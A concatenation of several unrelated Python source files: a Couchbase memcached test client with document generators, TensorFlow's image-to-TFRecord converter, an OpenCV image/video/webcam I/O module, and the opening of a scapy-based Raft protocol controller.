self.log.error("{0} while _send_op, server is alive?".format(error_msg))
return None
vbuckets = []
try:
error_json = json.loads(error_msg[error_msg.find('{'):error_msg.rfind('}') + 1])
except:
self.log.error("Error while getting CCCP from not_my_vbucket...\n %s" % error_msg)
return None
if 'vBucketMapForward' in error_json['vBucketServerMap']:
vBucketMap = error_json['vBucketServerMap']['vBucketMapForward']
else:
vBucketMap = error_json['vBucketServerMap']['vBucketMap']
serverList = error_json['vBucketServerMap']['serverList']
if not self.rest:
self.rest = RestConnection(self.info)
serverList = [server.replace("$HOST", str(self.rest.ip))
if server.find("$HOST") != -1 else server for server in serverList]
counter = 0
for vbucket in vBucketMap:
vbucketInfo = vBucket()
vbucketInfo.master = serverList[vbucket[0]]
if vbucket:
for i in range(1, len(vbucket)):
if vbucket[i] != -1:
vbucketInfo.replica.append(serverList[vbucket[i]])
vbucketInfo.id = counter
counter += 1
vbuckets.append(vbucketInfo)
return vbuckets
def sendHellos(self, feature_flag):
for m in self.memcacheds:
self.memcacheds[m].hello(feature_flag)
class KVStoreAwareSmartClient(VBucketAwareMemcached):
def __init__(self, rest, bucket, kv_store=None, info=None, store_enabled=True, scope=None, collection=None):
VBucketAwareMemcached.__init__(self, rest, bucket, info, scope=scope, collection=collection)
self.kv_store = kv_store or ClientKeyValueStore()
self.store_enabled = store_enabled
self._rlock = threading.Lock()
def set(self, key, value, ttl=-1, flag=0, scope=None, collection=None):
self._rlock.acquire()
try:
if ttl >= 0:
self.memcached(key).set(key, ttl, 0, value, scope=scope, collection=collection)
else:
self.memcached(key).set(key, 0, 0, value, scope=scope, collection=collection)
if self.store_enabled:
self.kv_store.write(key, hashlib.md5(value.encode()).digest(), ttl)
except MemcachedError as e:
self._rlock.release()
raise MemcachedError(e.status, e.msg)
except AssertionError:
self._rlock.release()
raise AssertionError
except:
self._rlock.release()
raise Exception("General Exception from KVStoreAwareSmartClient.set()")
self._rlock.release()
"""
" retrieve meta data of document from disk
"""
def get_doc_metadata(self, num_vbuckets, key, scope=None, collection=None):
vid = crc32.crc32_hash(key) & (num_vbuckets - 1)
mc = self.memcached(key, scope=scope, collection=collection)
metadatastats = None
try:
metadatastats = mc.stats("vkey {0} {1}".format(key, vid))
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
self.log.info(msg)
return metadatastats
def delete(self, key, scope=None, collection=None):
try:
self._rlock.acquire()
opaque, cas, data = self.memcached(key).delete(key, scope=scope, collection=collection)
if self.store_enabled:
self.kv_store.delete(key, scope=scope, collection=collection)
self._rlock.release()
if cas == 0:
raise MemcachedError(7, "Invalid cas value")
except Exception as e:
self._rlock.release()
raise MemcachedError(7, str(e))
def get_valid_key(self, key, scope=None, collection=None):
return self.get_key_check_status(key, "valid", scope=scope, collection=collection)
def get_deleted_key(self, key, scope=None, collection=None):
return self.get_key_check_status(key, "deleted", scope=scope, collection=collection)
def get_expired_key(self, key, scope=None, collection=None):
return self.get_key_check_status(key, "expired", scope=scope, collection=collection)
def get_all_keys(self, scope=None, collection=None):
return self.kv_store.keys(scope=scope, collection=collection)
def get_all_valid_items(self, scope=None, collection=None):
return self.kv_store.valid_items(scope=scope, collection=collection)
def get_all_deleted_items(self, scope=None, collection=None):
return self.kv_store.deleted_items(scope=scope, collection=collection)
def get_all_expired_items(self, scope=None, collection=None):
return self.kv_store.expired_items(scope=scope, collection=collection)
def get_key_check_status(self, key, status, scope=None, collection=None):
item = self.kv_get(key, scope=scope, collection=collection)
if item is not None and item["status"] == status:
return item
else:
msg = "key {0} is not valid".format(key)
self.log.info(msg)
return None
# safe kvstore retrieval
# return dict of {key,status,value,ttl}
# or None if not found
def kv_get(self, key, scope=None, collection=None):
item = None
try:
item = self.kv_store.read(key, scope=scope, collection=collection)
except KeyError:
msg = "key {0} doesn't exist in store".format(key)
# self.log.info(msg)
return item
# safe memcached retrieval
# return dict of {key, flags, seq, value}
# or None if not found
def mc_get(self, key, scope=None, collection=None):
item = self.mc_get_full(key, scope=scope, collection=collection)
if item is not None:
item["value"] = hashlib.md5(item["value"]).digest()
return item
# unhashed value
def mc_get_full(self, key, scope=None, collection=None):
item = None
try:
x, y, value = self.memcached(key).get(key, scope=scope, collection=collection)
item = {}
item["key"] = key
item["flags"] = x
item["seq"] = y
item["value"] = value
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
return item
def kv_mc_sync_get(self, key, status, scope=None, collection=None):
self._rlock.acquire()
kv_item = self.get_key_check_status(key, status, scope=scope, collection=collection)
mc_item = self.mc_get(key, scope=scope, collection=collection)
self._rlock.release()
return kv_item, mc_item
class KVStoreSmartClientHelper(object):
@staticmethod
def do_verification(client, scope=None, collection=None):
keys = client.get_all_keys(scope=scope, collection=collection)
validation_failures = {}
for k in keys:
m, valid = KVStoreSmartClientHelper.verify_key(client, k, scope=scope, collection=collection)
if (valid == False):
validation_failures[k] = m
return validation_failures
@staticmethod
def verify_key(client, key, scope=None, collection=None):
status = False
msg = ""
item = client.kv_get(key, scope=scope, collection=collection)
if item is not None:
if item["status"] == "deleted":
msg, status = \
KVStoreSmartClientHelper.verify_delete(client, key, scope=scope, collection=collection)
elif item["status"] == "expired":
msg, status = \
KVStoreSmartClientHelper.verify_expired(client, key, scope=scope, collection=collection)
elif item["status"] == "valid":
msg, status = \
KVStoreSmartClientHelper.verify_set(client, key, scope=scope, collection=collection)
return msg, status
# verify kvstore contains key with valid status
# and that key also exists in memcached with
# expected value
@staticmethod
def verify_set(client, key, scope=None, collection=None):
kv_item = client.get_valid_key(key, scope=scope, collection=collection)
mc_item = client.mc_get(key, scope=scope, collection=collection)
status = False
msg = ""
if kv_item is not None and mc_item is not None:
# compare values
if kv_item["value"] == mc_item["value"]:
status = True
else:
msg = "kvstore and memcached values mismatch"
elif kv_item is None:
msg = "valid status not set in kv_store"
elif mc_item is None:
msg = "key missing from memcached"
return msg, status
# verify kvstore contains key with deleted status
# and that it does not exist in memcached
@staticmethod
def verify_delete(client, key, scope=None, collection=None):
deleted_kv_item = client.get_deleted_key(key, scope=scope, collection=collection)
mc_item = client.mc_get(key, scope=scope, collection=collection)
status = False
msg = ""
if deleted_kv_item is not None and mc_item is None:
status = True
elif deleted_kv_item is None:
msg = "delete status not set in kv_store"
elif mc_item is not None:
msg = "key still exists in memcached"
return msg, status
# verify kvstore contains key with expired status
# and that key has also expired in memcached
@staticmethod
def verify_expired(client, key, scope=None, collection=None):
expired_kv_item = client.get_expired_key(key, scope=scope, collection=collection)
mc_item = client.mc_get(key, scope=scope, collection=collection)
status = False
msg = ""
if expired_kv_item is not None and mc_item is None:
status = True
elif expired_kv_item is None:
msg = 'exp. status not set in kv_store'
elif mc_item is not None:
msg = "key still exists in memcached"
return msg, status
def start_reader_process(info, keyset, queue):
ReaderThread(info, keyset, queue).start()
class GeneratedDocuments(object):
def __init__(self, items, kv_template, options=dict(size=1024)):
self._items = items
self._kv_template = kv_template
self._options = options
self._pointer = 0
if "padding" in options:
self._pad = options["padding"]
else:
self._pad = DocumentGenerator._random_string(options["size"])
self._pad = self._pad.decode()
# Required for the for-in syntax
def __iter__(self):
return self
def __len__(self):
return self._items
def reset(self):
self._pointer = 0
def has_next(self):
return self._pointer != self._items
# Returns the next value of the iterator
def __next__(self):
if self._pointer == self._items:
raise StopIteration
else:
i = self._pointer
doc = {"meta": {"id": "{0}-{1}".format(i, self._options["seed"])}, "json": {}}
for k in self._kv_template:
v = self._kv_template[k]
if isinstance(v, str) and v.find("${prefix}") != -1:
v = v.replace("${prefix}", "{0}".format(i))
# how about the value size
if isinstance(v, str) and v.find("${padding}") != -1:
v = v.replace("${padding}", self._pad)
if isinstance(v, str) and v.find("${seed}") != -1:
v = v.replace("${seed}", "{0}".format(self._options["seed"]))
doc["json"][k] = v
self._pointer += 1
return json.dumps(doc)
class DocumentGenerator(object):
# will loop over all values in props and replace ${prefix} with ${i}
@staticmethod
def make_docs(items, kv_template, options=dict(size=1024, seed=str(uuid.uuid4()))):
return GeneratedDocuments(items, kv_template, options)
@staticmethod
def _random_string(length):
return (("%%0%dX" % (length * 2)) % random.getrandbits(length * 8)).encode("ascii")
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def get_doc_generators(count, kv_template=None, seed=None, sizes=None):
seed = seed or str(uuid.uuid4())[0:7]
sizes = sizes or [128]
doc_gen_iterators = []
if kv_template is None:
kv_template = {"name": "doc-${prefix}-${seed}",
"sequence": "${seed}",
"email": "${prefix}@couchbase.com"}
for size in sizes:
options = {"size": size, "seed": seed}
docs = DocumentGenerator.make_docs(count // len(sizes),
kv_template, options)
doc_gen_iterators.append(docs)
return doc_gen_iterators
@staticmethod
def get_doc_generators_by_load_ratio(rest,
bucket='default',
ram_load_ratio=1,
value_size_distribution=None,
seed=None):
log = logger.Logger.get_logger()
if ram_load_ratio < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
info = rest.get_bucket(bucket)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in list(value_size_distribution.items()):
how_many = int(space_to_fill / (size + 250) * probability)
doc_seed = seed or str(uuid.uuid4())
kv_template = {"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": doc_seed}
options = {"size": size, "seed": doc_seed}
payload_generator = DocumentGenerator.make_docs(how_many, kv_template, options)
list.append({'size': size, 'value': payload_generator, 'how_many': how_many, 'seed': doc_seed})
return list
# docs = DocumentGenerator.make_docs(number_of_items,
# {"name": "user-${prefix}", "payload": "payload-${prefix}-${padding}"},
# {"size": 1024, "seed": str(uuid.uuid4())})
# Format of the json documents that mcsoda uses.
# JSON BODY
# {
# "key":"%s",
# "key_num":%s,
# "name":"%s",
# "email":"%s",
# "city":"%s",
# "country":"%s",
# "realm":"%s",
# "coins":%s,
# "achievements":%s
# }
class LoadWithMcsoda(object):
def __init__(self, master, num_docs, prefix='', bucket='default', rest_user='Administrator',
rest_password="password", protocol='membase-binary', port=11211):
rest = RestConnection(master)
self.bucket = bucket
vBuckets = rest.get_vbuckets(self.bucket)
self.vbucket_count = len(vBuckets)
self.cfg = {
'max-items': num_docs,
'max-creates': num_docs,
'min-value-size': 128,
'exit-after-creates': 1,
'ratio-sets': 1,
'ratio-misses': 0,
'ratio-creates': 1,
'ratio-deletes': 0,
'ratio-hot': 0,
'ratio-hot-sets': 1,
'ratio-hot-gets': 0,
'ratio-expirations': 0,
'expiration': 0,
'threads': 1,
'json': 1,
'batch': 10,
'vbuckets': self.vbucket_count,
'doc-cache': 0,
'doc-gen': 0,
'prefix': prefix,
'socket-timeout': 60,
}
self.protocol = protocol
self.rest_user = rest_user
self.rest_password = rest_password
if protocol == 'membase-binary':
self.host_port = "{0}:{1}:{2}".format(master.ip, master.port, port)
elif protocol == 'memcached-binary':
self.host_port = "{0}:{1}:{1}".format(master.ip, port)
self.ctl = {'run_ok': True}
def protocol_parse(self, protocol_in):
if protocol_in.find('://') >= 0:
protocol = \
'-'.join(((["membase"] + \
protocol_in.split("://"))[-2] + "-binary").split('-')[0:2])
host_port = ('@' + protocol_in.split("://")[-1]).split('@')[-1] + ":8091"
user, pswd = (('@' + protocol_in.split("://")[-1]).split('@')[-2] + ":").split(':')[0:2]
return protocol, host_port, user, pswd
def get_cfg(self):
return self.cfg
def load_data(self, scope=None, collection=None):
cur, start_time, end_time = mcsoda.run(self.cfg, {}, self.protocol, self.host_port, self.rest_user,
self.rest_password, ctl=self.ctl, bucket=self.bucket)
return cur
def load_stop(self):
self.ctl['run_ok'] = False
|
build_image_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected eror while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % labels_file)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
lib_images_io.py
|
#!/usr/bin/env python
'''
Classes for reading images from video, folder, or web camera,
and for writing images to video file.
Main classes and functions:
* Read:
class ReadFromFolder
class ReadFromVideo
class ReadFromWebcam
* Write:
class VideoWriter
* Display:
class ImageDisplayer
* Test:
def test_ReadFromWebcam
'''
import os
import warnings
import numpy as np
import cv2
import time
import glob
import threading
import queue
import multiprocessing
class ReadFromFolder(object):
''' A image reader class for reading images from a folder.
By default, all files under the folder are considered as image file.
'''
def __init__(self, folder_path):
self.filenames = sorted(glob.glob(folder_path + "/*"))
self.cnt_imgs = 0
self.cur_filename = ""
def read_image(self):
if self.cnt_imgs >= len(self.filenames):
return None
self.cur_filename = self.filenames[self.cnt_imgs]
img = cv2.imread(self.cur_filename, cv2.IMREAD_UNCHANGED)
self.cnt_imgs += 1
return img
def __len__(self):
return len(self.filenames)
def has_image(self):
return self.cnt_imgs < len(self.filenames)
def stop(self):
None
class ReadFromVideo(object):
def __init__(self, video_path, sample_interval=1):
''' A video reader class for reading video frames from video.
Arguments:
video_path
sample_interval {int}: sample every kth image.
'''
if not os.path.exists(video_path):
raise IOError("Video not exist: " + video_path)
assert isinstance(sample_interval, int) and sample_interval >= 1
self.cnt_imgs = 0
self._is_stoped = False
self._video = cv2.VideoCapture(video_path)
ret, image = self._video.read()
self._next_image = image
self._sample_interval = sample_interval
self._fps = self.get_fps()
if not self._fps >= 0.0001:
import warnings
warnings.warn("Invalid fps of video: {}".format(video_path))
def has_image(self):
return self._next_image is not None
def get_curr_video_time(self):
return 1.0 / self._fps * self.cnt_imgs
def read_image(self):
image = self._next_image
for i in range(self._sample_interval):
if self._video.isOpened():
ret, frame = self._video.read()
self._next_image = frame
else:
self._next_image = None
break
self.cnt_imgs += 1
return image
def stop(self):
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def get_fps(self):
# Find OpenCV version
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
# With webcam get(CV_CAP_PROP_FPS) does not work.
# Let's see for ourselves.
# Get video properties
if int(major_ver) < 3:
fps = self._video.get(cv2.cv.CV_CAP_PROP_FPS)
else:
fps = self._video.get(cv2.CAP_PROP_FPS)
return fps
class ReadFromWebcam(object):
def __init__(self, max_framerate=30.0, webcam_idx=0):
''' Read images from web camera.
Argument:
max_framerate {float}: the real framerate will be reduced below this value.
webcam_idx {int}: index of the web camera on your laptop. It should be 0 by default.
'''
# Settings
self._max_framerate = max_framerate
queue_size = 3
# Initialize video reader
self._video = cv2.VideoCapture(webcam_idx)
self._is_stoped = False
# Use a thread to keep on reading images from web camera
self._imgs_queue = queue.Queue(maxsize=queue_size)
self._is_thread_alive = multiprocessing.Value('i', 1)
self._thread = threading.Thread(
target=self._thread_reading_webcam_images)
self._thread.start()
# Manually control the framerate of the webcam by sleeping
self._min_dt = 1.0 / self._max_framerate
self._prev_t = time.time() - 1.0 / max_framerate
def read_image(self):
dt = time.time() - self._prev_t
if dt <= self._min_dt:
time.sleep(self._min_dt - dt)
self._prev_t = time.time()
image = self._imgs_queue.get(timeout=10.0)
return image
def has_image(self):
return True # The web camera always has new image
def stop(self):
self._is_thread_alive.value = False
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def _thread_reading_webcam_images(self):
while self._is_thread_alive.value:
ret, image = self._video.read()
if self._imgs_queue.full(): # if queue is full, pop one
img_to_discard = self._imgs_queue.get(timeout=0.001)
self._imgs_queue.put(image, timeout=0.001) # push to queue
print("Web camera thread is dead.")
class VideoWriter(object):
def __init__(self, video_path, framerate):
# -- Settings
self._video_path = video_path
self._framerate = framerate
# -- Variables
self._cnt_img = 0
# initialize later when the 1st image comes
self._video_writer = None
self._width = None
self._height = None
# -- Create output folder
folder = os.path.dirname(video_path)
if not os.path.exists(folder):
os.makedirs(folder)
video_path
def write(self, img):
self._cnt_img += 1
if self._cnt_img == 1: # initialize the video writer
fourcc = cv2.VideoWriter_fourcc(*'XVID') # define the codec
self._width = img.shape[1]
self._height = img.shape[0]
self._video_writer = cv2.VideoWriter(
self._video_path, fourcc, self._framerate, (self._width, self._height))
self._video_writer.write(img)
def stop(self):
self.__del__()
def __del__(self):
if self._cnt_img > 0:
self._video_writer.release()
print("Complete writing {}fps and {}s video to {}".format(
self._framerate, self._cnt_img/self._framerate, self._video_path))
class ImageDisplayer(object):
''' A simple wrapper of using cv2.imshow to display image '''
def __init__(self):
self._window_name = "cv2_display_window"
cv2.namedWindow(self._window_name)
def display(self, image, wait_key_ms=1):
cv2.imshow(self._window_name, image)
cv2.waitKey(wait_key_ms)
def __del__(self):
cv2.destroyWindow(self._window_name)
def test_ReadFromWebcam():
''' Test the class ReadFromWebcam '''
webcam_reader = ReadFromWebcam(max_framerate=10)
img_displayer = ImageDisplayer()
import itertools
for i in itertools.count():
img = webcam_reader.read_image()
if img is None:
break
print(f"Read {i}th image...")
img_displayer.display(img)
print("Program ends")
if __name__ == "__main__":
test_ReadFromWebcam()
|
Controller.py
|
from scapy.all import *
from packet_sender import Raft, send_no_reply, COMMANDS
from threading import Event
from utils.Switch_Register_Manager import CustomConsole
from timeit import default_timer as timer
import argparse
RANDOM_TIMEOUT = {'min': 150, 'max': 300} # min max values in ms
RAFT_HEARTBEAT_RATE = 50
STATUSES = {'follower': 0, 'candidate': 1, 'leader': 2}
RAFT_PROTOCOL_DSTPORT = 0x9998
IP_MULTICAST_ADDRESS = '224.0.255.255'
logging_format = '%(asctime)-15s [%(threadName)s] - [%(funcName)s] %(message)s'
level = logging.DEBUG # Change to Error or something like that to silence the log to file!
logging.basicConfig(filename='./logs/controller.log', level=level, format=logging_format)
logger = logging.getLogger()
class Controller(object):
def __init__(self, controller_ip):
self.status = STATUSES['follower']
self.timeout_thread = None
self.controller_ip = controller_ip
#self.nodes_id_map = {'10.0.1.254': 1, '10.0.2.254': 2, '10.0.3.254': 3, '10.0.4.254': 4, '10.0.5.254': 5}
self.nodeID = args.ID # the controllee raft node
self.term = 0
self.logIndex = 0
self.counter_new_request = 0
self.counter_rejected_requests = 0
self.sniffer = AsyncSniffer(
iface='ve_A',
lfilter=is_ingoing_raft_packet,
prn=lambda _pkt: self.handle_packet(_pkt)
)
self.sniffer.start()
self.heartbeat_loop_thread = threading.Thread(target=self.heartbeats_loop)
self.heartbeat_loop_thread.start()
self.time = None
self.init_timeout() # starting as follower, we need to start the timeout
def handle_packet(self, packet):
if packet[Raft].messageType == COMMANDS['RequestVote'] and packet[Raft].sourceID == self.nodeID:
self.status = STATUSES['candidate']
self.time = timer()
print('vote request: -> state: {};'.format(self.status))
